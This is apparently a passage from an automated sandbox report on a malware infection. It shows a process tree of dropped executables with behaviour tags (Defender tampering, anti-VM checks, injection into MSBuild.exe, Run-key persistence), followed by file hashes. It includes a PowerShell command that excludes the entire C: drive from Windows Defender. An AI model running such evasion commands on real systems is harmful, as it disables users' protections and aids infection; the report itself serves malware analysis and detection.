                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4468 -prefsLen 34775 -prefMapHandle 4472 -prefMapSize 270279 -jsInitHandle 4476 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4448 -initialChannelId {a955fbb0-b739-4308-895d-5fec6f0f124b} -parentPid 4752 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4752" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                    9⤵
                                                                    • Checks processor information in registry
                                                                    PID:4872
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5056 -prefsLen 35012 -prefMapHandle 5052 -prefMapSize 270279 -ipcHandle 5072 -initialChannelId {8b3b993b-c07e-4da4-81d7-e050eb7e82b7} -parentPid 4752 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4752" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                    9⤵
                                                                    • Checks processor information in registry
                                                                    PID:6024
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1636 -prefsLen 32952 -prefMapHandle 5284 -prefMapSize 270279 -jsInitHandle 5312 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5320 -initialChannelId {83d53a7a-3de6-473d-85ea-d50f2210f03d} -parentPid 4752 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4752" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                    9⤵
                                                                    • Checks processor information in registry
                                                                    PID:5136
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5516 -prefsLen 32952 -prefMapHandle 5520 -prefMapSize 270279 -jsInitHandle 5524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5488 -initialChannelId {f4beae31-3e42-4fd9-9f74-1827120b2b73} -parentPid 4752 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4752" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                    9⤵
                                                                    • Checks processor information in registry
                                                                    PID:5172
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5552 -prefsLen 32952 -prefMapHandle 5556 -prefMapSize 270279 -jsInitHandle 5560 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5568 -initialChannelId {a5b3b590-c172-4b4b-bd14-d699a27fb3ad} -parentPid 4752 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4752" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                    9⤵
                                                                    • Checks processor information in registry
                                                                    PID:5180
                                                            • C:\Users\Admin\AppData\Local\Temp\10419580101\c6eefc65db.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10419580101\c6eefc65db.exe"
                                                              6⤵
                                                              • Modifies Windows Defender DisableAntiSpyware settings
                                                              • Modifies Windows Defender Real-time Protection settings
                                                              • Modifies Windows Defender TamperProtection settings
                                                              • Modifies Windows Defender notification settings
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Windows security modification
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5980
                                                            • C:\Users\Admin\AppData\Local\Temp\10419590101\09e9f31660.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10419590101\09e9f31660.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:5856
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                7⤵
                                                                  PID:5904
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5284
                                                              • C:\Users\Admin\AppData\Local\Temp\10419600101\e64ba97824.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10419600101\e64ba97824.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5168
                                                              • C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5564
                                                              • C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:1968
                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                  7⤵
                                                                    PID:6060
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2756
                                                                  • C:\Windows\system32\svchost.exe
                                                                    "C:\Windows\system32\svchost.exe"
                                                                    7⤵
                                                                    • Downloads MZ/PE file
                                                                    • Adds Run key to start application
                                                                    PID:1676
                                                                    • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                      "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:5672
                                                                    • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                      8⤵
                                                                      • Deletes itself
                                                                      • Executes dropped EXE
                                                                      PID:2900
                                                                • C:\Users\Admin\AppData\Local\Temp\10419630101\qWR3lUj.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10419630101\qWR3lUj.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:5560
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                    7⤵
                                                                      PID:5696
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                      7⤵
                                                                        PID:5716
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                        7⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:5700
                                                                    • C:\Users\Admin\AppData\Local\Temp\10419640101\TbV75ZR.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10419640101\TbV75ZR.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:6432
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                        7⤵
                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:6464
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 504
                                                                          8⤵
                                                                          • Program crash
                                                                          PID:5764
                                                                    • C:\Users\Admin\AppData\Local\Temp\10419650101\4ef68b1a92.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10419650101\4ef68b1a92.exe"
                                                                      6⤵
                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                      • Checks BIOS information in registry
                                                                      • Executes dropped EXE
                                                                      • Identifies Wine through registry keys
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:5752
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3848 -ip 3848
                                                            1⤵
                                                              PID:2468
                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                              1⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3744
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                              1⤵
                                                                PID:3472
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                1⤵
                                                                  PID:1428
                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  1⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:12964
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6464 -ip 6464
                                                                  1⤵
                                                                    PID:6540

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v15

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

                                                                    Filesize

                                                                    1.9MB

                                                                    MD5

                                                                    bad4357401102697881e78923e2607b6

                                                                    SHA1

                                                                    3c7e3e0ad44794f30d8cf1f959c362a2530fa041

                                                                    SHA256

                                                                    0eb55f5eec3f0e585d84a23aca557b5cd9f2ea953af8d79489a2ee596d416320

                                                                    SHA512

                                                                    92dd1d94abe6f3ad7fc464664ade8182caf3b0a308a936a8390c00cda719c203df7f5e68795f5cb6134f507ce730bf690b21bd73ab8b7899bd988fcca9792faf

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\28X5YDPF\service[1].htm

                                                                    Filesize

                                                                    1B

                                                                    MD5

                                                                    cfcd208495d565ef66e7dff9f98764da

                                                                    SHA1

                                                                    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                    SHA256

                                                                    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                    SHA512

                                                                    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Filesize

                                                                    16KB

                                                                    MD5

                                                                    b514a6cbf440f90c0960e1513dd36ea4

                                                                    SHA1

                                                                    fa5cf7cae812dadfa233a2a4ccd3fc5b25ea9cd4

                                                                    SHA256

                                                                    5139ab01bd24076f32dd2353949420c125a71ef7fd87c2306d3d30187fb57325

                                                                    SHA512

                                                                    442e5eda87a7f4d4f54b3ca0b9e61c0581604bfbaafb0b56672a545701a713772a3a673ce30c3383c0a0de886b701f37f5ff28183cd86e32483f376ad43830fc

                                                                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\clr2s0gc.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

                                                                    Filesize

                                                                    13KB

                                                                    MD5

                                                                    31f916f57263ff1b99fe8f42ced53c48

                                                                    SHA1

                                                                    7f75fd268af1d48e78c216881cf32e2b521434e7

                                                                    SHA256

                                                                    4b16df6d0f66e9030fceb07b1b6f2bc3a15939284486211275b78bb030a52de1

                                                                    SHA512

                                                                    64d970d1208b4f2f788f651357a547304ff20be4d598a6917604f073c347b5760a4588041a174216bf3ce1f0ae89dd96185b3d3f61ed5308148aa6a2a0fbe382

                                                                  • C:\Users\Admin\AppData\Local\TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE

                                                                    Filesize

                                                                    1.8MB

                                                                    MD5

                                                                    7b4c5fa52c698720d7d9e45ed2d7a711

                                                                    SHA1

                                                                    0242af88692e8fd8e1075a762ae13cf315385a6c

                                                                    SHA256

                                                                    058476af0241212cf5ed6dd22bd2eba6ec72afea0364357fba9eb870f06c2368

                                                                    SHA512

                                                                    2358ea5f1a59cbd7041872bb3ce349dda31a559d8a697cd20443bef825f33602b1b41123dd7cf37b6a1d7d9cac03fe17bb08be8651b30968e20b8a5e6c788327

                                                                  • C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe

                                                                    Filesize

                                                                    327KB

                                                                    MD5

                                                                    fda2e2ddccb519a2c1fb72dcaee2de6f

                                                                    SHA1

                                                                    efd50828acc3e182aa283c5760278c0da1f428a6

                                                                    SHA256

                                                                    cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57

                                                                    SHA512

                                                                    28c79ed9a9d5db3920b7e942c66670eec02046fa3d751ad18e9b3597caab76645b194bfa18bb5925ecfb8d201a291a44ee427ef39632f673db39edc43111c3cf

                                                                  • C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe

                                                                    Filesize

                                                                    8.0MB

                                                                    MD5

                                                                    00ef7099fe1630a82aec7bf3e845c106

                                                                    SHA1

                                                                    81b6e7f72824216a02a06fa6abc828d2568fbc14

                                                                    SHA256

                                                                    a87a6091b3f9e0f43f91f829ef4737b75fa608e0ffdd9f87ea98f2be3de6d1c9

                                                                    SHA512

                                                                    59972541aff304e67c34cefdf536f608d3ee979066e8216bbcd361b0056a4febbef8f11e5941c52fd3e1c75b6860f0c6fd9aeee5faea3dd94babbc98c1429a62

                                                                  • C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe

                                                                    Filesize

                                                                    211KB

                                                                    MD5

                                                                    5c1bb6cac0b3da6e012442037cf62a64

                                                                    SHA1

                                                                    f21a600e3c03309e485668481a2890e9a1f27180

                                                                    SHA256

                                                                    d9d77d43ebceb7caf5bee3bf6ad57a608650da4c6542f6870943409c39e9fa7c

                                                                    SHA512

                                                                    dd57ac222984c6e72f98b2c22f2f744692c9ba447f41be06a89de2f926b0ce2dad03aecd224df71d24751661ce481cbd7c6301810e5e149e0118d2d132b4aba1

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419530101\0d58f17e45.exe

                                                                    Filesize

                                                                    4.5MB

                                                                    MD5

                                                                    82a660623656c064fb7a7598ff283512

                                                                    SHA1

                                                                    9962f734b944a3c60879d590d974db4eb85a41c5

                                                                    SHA256

                                                                    579aa629ade38640ab1fb3f8c9e7a1c172062d4740fc797456803db12415ca51

                                                                    SHA512

                                                                    e08d0a106869753789e2212c2eef998b56a20baf0080ceb9112eb6fa01e6e92751850fa2ee5e3a261adc30514f7b76bf2585dd0de3f3774011d06565d861f157

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419540101\5a6472d2dc.exe

                                                                    Filesize

                                                                    4.3MB

                                                                    MD5

                                                                    d7d5b2f460ab2a552ccd37ffe846f39a

                                                                    SHA1

                                                                    a84bd114c44827a07e29a548211c769bfda274c2

                                                                    SHA256

                                                                    5a19f74e5205b970c5f36c0c466f2f888412e14bf7f95b22856c4a7739e64eb1

                                                                    SHA512

                                                                    502e408d9fd0fc15bcc23b8f958a96cd8f26306513802f30e6ee0dda985ce409cbf99c7ff2385002d2de1be005317b8cb011cecd0989fed0da58c59e8b771b7f

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419550101\632e73f709.exe

                                                                    Filesize

                                                                    2.0MB

                                                                    MD5

                                                                    69688177ed1baa1e21ebf5b8cc5d416e

                                                                    SHA1

                                                                    eba68df7434baadb9a536f6cd7d66ff113a42ffa

                                                                    SHA256

                                                                    b59e061f2ea5a7f4cdd2a5edeead169998f9a9ee959e51386051f69a518a263c

                                                                    SHA512

                                                                    55fd5ea2b5fcfe6fa6bf79d3fe6e5a5e44e85a487d7709e4e5e047716aa33a9c6360491fe2d781f459ebe3d7e204cfd5cc751fc0eb9a11435fac959111e3d6cd

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419560101\a399701ee4.exe

                                                                    Filesize

                                                                    2.4MB

                                                                    MD5

                                                                    6bcaa6f066af78f85f1106de1ea00031

                                                                    SHA1

                                                                    4981bdc7125f2460afc0b514241c785736d71268

                                                                    SHA256

                                                                    27613cc4f4a71db26084707ad958d9e8228e654e4ea575dd1c0dc7bbb92845cd

                                                                    SHA512

                                                                    1364694219b2730de483b201586da626889e36d661aa4c53b96e10baa5ee47c04f00e1779dec01335938538272bcc77a905f626f1a2f1e3a964c3b3d6972a96b

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419570101\9bdc94caf0.exe

                                                                    Filesize

                                                                    950KB

                                                                    MD5

                                                                    dcfce6257bd41af54060a4429662d291

                                                                    SHA1

                                                                    b14fda486f0dcc3167432666aea136ef962f66bc

                                                                    SHA256

                                                                    1a3be077f95f1f86b8efae98b20b07d389225860d31027d1f0638841475f7612

                                                                    SHA512

                                                                    d8e6dd08a65a340dec6aa30f29e45990393c36d65372811108e754fdb4decc6f959abbd15bcd4a0cc1eb013c7fe3d6bcf42cb8672f3cd2681f032244b31b2842

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419580101\c6eefc65db.exe

                                                                    Filesize

                                                                    1.6MB

                                                                    MD5

                                                                    5fc1c5eb9a034468541060c199beeb32

                                                                    SHA1

                                                                    d5f39e29fc056e56d62984a759bc396928cdcfd5

                                                                    SHA256

                                                                    25ccf0acdb6d0d78422a25b800472e22d3e6f00e1a7a58ef51bd53c364541650

                                                                    SHA512

                                                                    0148bafd450034dffe559d278211f7b5951d064866c446818f8d0fabfe8b887ea06fc5c08958811dc55481d88ca81039cafae36ee4c0932aecc53b101a0aa410

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419590101\09e9f31660.exe

                                                                    Filesize

                                                                    2.1MB

                                                                    MD5

                                                                    8b7a6718ca74360fe9f51999563d5bd4

                                                                    SHA1

                                                                    bba0641bc9c1360d8df011c5ad99d648536fd2a2

                                                                    SHA256

                                                                    bb27921192d981c37db53a0c53e5298d35b5bb219638c66eb1ee2d63ccd2096d

                                                                    SHA512

                                                                    3b3fe72040fadbb15273e2bbf6ccdd02a2cf8c736d1d8dac3a5c006274ac9d31e3c44dc5f793afbc98696bd958714b48f8a5efe7e7f2f17a5ceb6b5d308392d0

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419600101\e64ba97824.exe

                                                                    Filesize

                                                                    716KB

                                                                    MD5

                                                                    57a5e092cf652a8d2579752b0b683f9a

                                                                    SHA1

                                                                    6aad447f87ab12c73411dec5f34149034c3027fc

                                                                    SHA256

                                                                    29054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34

                                                                    SHA512

                                                                    5759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419600101\e64ba97824.exe

                                                                    Filesize

                                                                    358KB

                                                                    MD5

                                                                    e604fe68e20a0540ee70bb4bd2d897d0

                                                                    SHA1

                                                                    00a4d755d8028dbe2867789898b1736f0b17b31c

                                                                    SHA256

                                                                    6262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361

                                                                    SHA512

                                                                    996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe

                                                                    Filesize

                                                                    354KB

                                                                    MD5

                                                                    27f0df9e1937b002dbd367826c7cfeaf

                                                                    SHA1

                                                                    7d66f804665b531746d1a94314b8f78343e3eb4f

                                                                    SHA256

                                                                    aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                                                                    SHA512

                                                                    ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe

                                                                    Filesize

                                                                    1.2MB

                                                                    MD5

                                                                    18b6c58f5f099a577c2f322eba74d1e9

                                                                    SHA1

                                                                    11cf8353e6adcf12061b4afb95c63308bda399b2

                                                                    SHA256

                                                                    2c5b54f2576e1524d5dc1c5405d2b8cfe72fc16ca2a1c7c319e0961833d9d069

                                                                    SHA512

                                                                    3f83df8396fe63f1a0cc1595b9923ebf879e69a24d4cff96cb4460b7143a3f2eaca99379f955af10ad06cc6d8a0fc2d846d40aaafcb258b4a4e6956de89d4d49

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419630101\qWR3lUj.exe

                                                                    Filesize

                                                                    1.9MB

                                                                    MD5

                                                                    f88e81846f7e7666edb9f04c933fd426

                                                                    SHA1

                                                                    80dae46a3c2c517b4c1b5d95228b0d5dcfa65359

                                                                    SHA256

                                                                    c8cb3ae4287b10d16c5557b47a6ad9220f097f5449da1c4e575a8194219806d3

                                                                    SHA512

                                                                    c86b57f648069d31f2ef3bfddc5cb9f36698e113d52966f4b060c5f0212c5a87331d34ca32f04ea5655d79e8e7e7c17f763ac70b07b0558fb87ff8ef54861c5a

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419640101\TbV75ZR.exe

                                                                    Filesize

                                                                    2.1MB

                                                                    MD5

                                                                    88796c2e726272bbd7fd7b96d78d1d98

                                                                    SHA1

                                                                    b359918e124eda58af102bb1565c52a32613c656

                                                                    SHA256

                                                                    85fa677d5892fe5c794eb9d0e51dd317b8d898e97c49a9a1c4875417c0147556

                                                                    SHA512

                                                                    71a2c25af532942b5676eb0274ed7dcd75c6a4ce69d3bd9541f162d466abb7be299394111a718774884c3cde8518b11fb926343f93a06853433664065510280c

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419650101\4ef68b1a92.exe

                                                                    Filesize

                                                                    1.8MB

                                                                    MD5

                                                                    8cb173ee6c676005ddb932a6719d5440

                                                                    SHA1

                                                                    4f7aec0f5ceaffafda9b54fe986e13c117eff50d

                                                                    SHA256

                                                                    80582d7fd871035f9e625173750937f6fc719be8a246707392db13bf39b7c51f

                                                                    SHA512

                                                                    691dfc7a1a86891c8c9f36e3e5966c99c2ad12c2b7bc8e6889eaa85b5d9bc38510aafa85590040492bd86c5cfb979189c5054367b3d845e97abd1e0d7a0e5d71

                                                                  • C:\Users\Admin\AppData\Local\Temp\10419660101\PQPYAYJJ.exe

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    4f8afc2689243991dcede77ebc8b25c8

                                                                    SHA1

                                                                    4504bfb7458298826d7a09dca4edd4e8c520497d

                                                                    SHA256

                                                                    8609fbf6d25103698c09480062dd212a9f8e8acbc3d320f599bd871cef1a7048

                                                                    SHA512

                                                                    4e2cdec8a27a6bec4704c8351fd1e8b05bdab66798b67590d271ca48a0a8f36b394ac744e08e2e4b36f11bda171f00b0addf71188e601aad312cfec8bfed5ec3

                                                                  • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

                                                                    Filesize

                                                                    81B

                                                                    MD5

                                                                    ea511fc534efd031f852fcf490b76104

                                                                    SHA1

                                                                    573e5fa397bc953df5422abbeb1a52bf94f7cf00

                                                                    SHA256

                                                                    e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

                                                                    SHA512

                                                                    f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

                                                                  • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                                                                    Filesize

                                                                    751B

                                                                    MD5

                                                                    bb0b9e0379a4fec316ef99e9b5b5a7ae

                                                                    SHA1

                                                                    855987c1bb04694f71a4f0c4fa83ae0006a1667e

                                                                    SHA256

                                                                    8e686ab0bc2298df500ab38cbac51d7355e1c55a16a7ecde8ba1644c0e70ce4d

                                                                    SHA512

                                                                    85f27c5703fad90c2fcc106cdc59ca23f774a19f100fc37ef594991b041aa86958bdcd506721416e5e995526a596ea17d1f5279d8dfdd70a45d18ca6087c74bb

                                                                  • C:\Users\Admin\AppData\Local\Temp\261.exe

                                                                    Filesize

                                                                    88KB

                                                                    MD5

                                                                    89ccc29850f1881f860e9fd846865cad

                                                                    SHA1

                                                                    d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                                    SHA256

                                                                    4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                                    SHA512

                                                                    0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                                  • C:\Users\Admin\AppData\Local\Temp\38eVJjXmk.hta

                                                                    Filesize

                                                                    717B

                                                                    MD5

                                                                    239ef93d7ee597958f13843b4a282908

                                                                    SHA1

                                                                    f9234ef8d93957fa0ee8c9ac7a06b154f3c75beb

                                                                    SHA256

                                                                    9dc008b93dee77e3b879b3df19bd6eeff8598def263a3b8116c90942ac51f248

                                                                    SHA512

                                                                    3a7e4a10d40ddf910bd5599a365c1dc45013d977e7406f295b2b7543a05c4df989a57da62dc5d10d4d27d5c31402e6f87419554d239b07d79c038476c513a11f

                                                                  • C:\Users\Admin\AppData\Local\Temp\7V4EDJ24R8Cw8rE4SGJ\YCL.exe

                                                                    Filesize

                                                                    3.0MB

                                                                    MD5

                                                                    91f372706c6f741476ee0dac49693596

                                                                    SHA1

                                                                    8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

                                                                    SHA256

                                                                    9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

                                                                    SHA512

                                                                    88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

                                                                  • C:\Users\Admin\AppData\Local\Temp\C6EA.tmp\C6EB.tmp\C6EC.bat

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    e5ddb7a24424818e3b38821cc50ee6fd

                                                                    SHA1

                                                                    97931d19f71b62b3c8a2b104886a9f1437e84c48

                                                                    SHA256

                                                                    4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                                                    SHA512

                                                                    450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v2ve0n50.ffe.ps1

                                                                    Filesize

                                                                    60B

                                                                    MD5

                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                    SHA1

                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                    SHA256

                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                    SHA512

                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                  • C:\Users\Admin\AppData\Local\Temp\d3RJV2SZ\Bunifu_UI_v1.5.3.dll

                                                                    Filesize

                                                                    236KB

                                                                    MD5

                                                                    2ecb51ab00c5f340380ecf849291dbcf

                                                                    SHA1

